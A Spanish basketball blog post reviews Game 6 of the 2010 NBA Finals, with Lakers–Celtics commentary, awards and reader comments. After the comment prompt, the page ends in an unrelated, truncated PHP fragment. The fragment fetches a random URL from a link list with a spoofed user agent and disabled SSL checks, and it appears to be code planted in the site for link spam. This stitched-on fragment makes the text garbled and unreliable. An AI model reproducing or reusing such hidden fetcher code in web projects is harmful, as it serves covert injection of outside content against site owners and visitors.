Finales (6º partido): Tuesday night fever

16 de June de 2010 por TheDeerHunter

“La fiebre amarilla”, que diría nuestro añorado Andrés, anoche hizo enfermar hasta al más estoico de los corazones verdes. El otro día decíamos que los Celtics se merecen ser campeones pase lo que pase y ahora también lo extendemos a los Lakers. Es inminente la conclusión de una final que será recordada durante décadas. Disfrutadla cuanto podáis, porque se trata de un acontecimiento baloncestístico que únicamente tiene lugar una o dos veces cada 50 años. ¿Quién sabe si podremos volver a presenciar algo así?

Cuando anoche empezaron a entrar las primeras canastas de Artest los Celtics se dieron cuenta que no iba a ser una noche fácil para ellos. La impotencia en defensa se tradujo pronto a impotencia en ataque, muy nerviosos y fallones de la mano de un Rondo negado. El propio Artest, Kobe, Gasol, Bynum… golpeaban incansablemente al hígado del rival y éstos quedaban completamente noqueados en una acción fortuita que terminaba con un esguince de rodilla de Perkins. Un terrible presagio contra el quinteto invencible.

Todo a la deriva, Rasheed no aguantó en pista nada más que unos pocos minutos con 3 faltas extremadamente rápidas y los Lakers sacaban literalmente de los tableros a Garnett y Davis, con Odom por primera vez combativo y un banquillo irreconocible. Los aficionados locales se frotaban los ojos ante canastones de Farmar, Vujacic y los mates sobrehumanos de Shannon, sin hablar del gran trabajo defensivo que hicieron todos ellos. A todo esto, con Kobe y Pau mandando como en sus mejores noches. La actuación más completa y global de ambos en la noche más importante hasta la fecha. Por algo son la mejor pareja de la liga.

Con 31 puntos encajados en toda la primera parte los Lakers levantaron un poco el pie del acelerador en la segunda. Rivers habría hecho mención a aquella remontada de 24 puntos de hace dos años, con James Posey jugando de ala-pívot. Anoche no había ninguno como él en pista. El banco verde 0 puntos en 3 cuartos. Se vio algo de relajación amarilla pero de la remontada ni flores. Al final del tercer cuarto los Lakers mandaban por 25. Sobraba el último… si no había sobrado algún cuarto más antes.

La única emoción que quedaba era comprobar si Pau alcanzaba el triple doble o si Morrison salía a jugar. Ni una cosa ni la otra y eso que Phil fue más condescendiente con el folklore popular que en otras ocasiones permitiendo jugar al español demasiados minutos. Fue fiel a su estilo, sin embargo, sentándolo silenciosamente en medio de un tiempo muerto, sin contribuir a la fiesta popular en un cambio en juego. Durante un rato los más frickies de esto pudimos disfrutar del espectacular duelo DJ Mbenga vs Shelden Williams en la noche más negra para el segundo. Seguro que tardará en olvidar el primer mate fallado sin oposición cuando todavía había atisbos de partido, tras eso todo fue a peor para él…y lo que le espera si Perkins no juega.

Los Lakers ni celebraron su brillante victoria, lo más que vimos fue un sencillo abrazo de Kobe y Pau. Todo o nada para el séptimo y “lo que ha pasado antes no importa”, decía Rondo al terminar pasando página a su nefasto partido. El jueves habrá algún récord inmortal que termine, el de Phil de 47-0 o el de los Celtics que siempre ganaron a los Lakers en el decisivo. Nada de eso tendrá trascendencia. Todos debemos firmar ahora mismo para que gane el mejor de estos dos increibles campeones. Sólo puede quedar uno.

PREMIOS

MVP: Hoy habría que destacar el partido al completo de los amarillos, del primero al último. Pero como siempre hay que personalizar en alguien es obligado quedarnos con LA pareja. Kobe se fue a los 26 puntos, 11 rebotes y 4 robos y Gasol a los 17 puntos, 13 rebotes, 9 asistencias y 3 tapones. Respondieron cuando más necesario era.

Sorpresa: El gran papel del banquillo angelino nos dejó a todos pegados al asiento. Hacía el final del tercer cuarto había anotado 24 puntos por 0 del banquillo verde. También hay que destacar esos 8 puntos de Ron Artest en el primer cuarto.

Decepción: Los Celtics de principio a fin. Parece mentira que fueran ellos los que salieron a la cancha totalmente superados por el ambiente.

Esfuerzo en vano: Tal vez podríamos salvar a Ray Allen de la quema en el día que volvió a anotar un triple. 19 puntos para él pero fallando alguna que otra canasta facilísima.

Comenta

9 comentarios a esta entrada

  1. pablito dice:
    #1

    La lesión de Perkins iguala la de Bynum. El séptimo será una guerra en todos los sentidos.

      Citar

  2. TheDeerHunter dice:
    #2

    Lanzo otro hilo de debate paralelo al partidazo.
    Oí un rumor en la retransmisión que me dejó con el culo torcido: Kerr a Portland. La noticia es que deja los Suns por diferencias económicas que no vienen al caso.

    Así que el que ha ganado la batalla ha sido McMillan. La pierde Pritchard. Qué alguno de los grandes defensores del coach me lo explique, porque no lo puedo entender ni harto de vino.

    Esa es la política del (ex) equipo más prometedor de la liga (¿gracias a quién lo era?) Me da que la realidad os va a explotar de forma inminente. Cuestión de tiempo.

      Citar

  3. Nacho dice:
    #3

    Buen partido, mientras lo hubo. Alguno pudimos acostarnos antes.
    Ater decía que no me pareció tan malo el 5º de Gasol, y que los Lakers habían corregido el cierre del rebote. Hoy corrigieron la circulación de la bola. Inmenso Gasol en este apartado, que fue su losa en el quinto. Ayudó, como no, que a Artest le entraran los tiros.
    Una cosa está clara; el maestro Zen y los suyos corrigen los errores de los partidos en el siguiente. Para una serie larga que no llegue al 7º está muy bien. El partidazo de anoche hace que no tenga nada que corregir. ¿Sabrá hacerlo, si lo necesita, en el transcurso del partido? Hasta ahora no ha dado muestras de ello.
    Otra cosa clara; Doc Rivers sí ha dado muestras de cambiar el curso de los partidos durante los mismos. Ayer las soluciones que intentó fallaron, pero ofrece más seguridad a la hora de manejar el tiempo del juego. Solo unos Lakers inmensos, como anoche, pueden abortar las propuestas de Doc. ¿Su gran problema? la baja de Perkins, ya vimos anoche que no es lo mismo ser revulsivo que actor principal (me vienen a la mente los Llorente, sobre todo el futbolero), con lo que la utilización de Davies será clave.

    ¿Pronóstico? Yo quiero que ganen los Lakers, y que Gasol siga haciendo historia en este país, pero que pronostique el resultado otro, el vitoriano que dijera que Caja Laboral ganaba en tres.
    De todas formas nuestro sueño cumplido, siete partidos. Como dice The Deer, disfrutemos, que no sabemos cuando se volverá a producir.

    P.D. Ay de los que no creiáis en Vujacic. (Dejadme que saque pecho, que no se cuando lo podré volver a hacer)

      Citar

  4. PIRATA dice:
    #4

    Dificil pronosticar, pero una cosa esta clara los buenos partidos de LAL los han ganado holgadamente y los buenos partidos de CELTICS los han ganado por menos de 10 y con opcion amarilla…..ya veremos lo qui si es seguro es que será un partidazo, me atrevo a pronosticar un partidazo de Black Mamba seguro.

      Citar

  5. TheDeerHunter dice:
    #5

    Filipante lo de Vujacic, Nacho… yo que tú me dedicaba a las apuestas o a la adivinación
    Yo desde luego ya no daba un duro, al menos hasta el año que viene que renueva
    A colación, anoche decían en el plus que fue su mejor partido desde el 3º en la final del 2008. Había llovido.

      Citar

  6. Love Denise dice:
    #6

    no he visto los 2 ultimos partidos, por motivos laborales, gracias por informarnos con vuestras cronicas
    Eso si, que nadie saque pecho por Vujacic, que el esloveno hace un partido bueno con menos frecuencia que el cometa Halley pasando cerca la Tierra, y no le metais tanta caña a Gasol, que es uno de los pocos al que no se le puede reprochar nada, en cambio, otros que cobran bastante siempre se van de rositas sin ninguna critica.

      Citar

  7. Toni dice:
    #7

    Win the seventh and go to the heaven.

    Bien vujacic, bien Gasol aunque un tanto fallon en el tiro.. bien todos, hasta Odom qe ya es decir.
    Si Odom se muestra tal y como la madrugada pasada y Bynum puede jugar los minutos que se guardó de anoche, sin el buen hacer de Perkins en la Pintura los amarillos lo tienen algo mejor pero siempre con el temor de que alguno de los exteriores de Boston haga el partido de las finales y desnivele la balanza, todo es posible.

      Citar

  8. Toni dice:
    #8

    qedaria mejor con la segunda frase en futuro.
    Win the seventh and you’ll go to the heaven.

      Citar

  9. Josep Àngel Colomés dice:
    #9

    La jugada del partido, el mate de Shanon Brown, asistencia de Pau Gasol, es una de las jugadas de la temporada y quizá de la década. Cómo salta, cómo vuela, cómo la coge a una mano, cómo la remata, cómo se desprende del aro. Qué belleza plástica madre mía!

    Saludos amigos desde NBA conexión

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>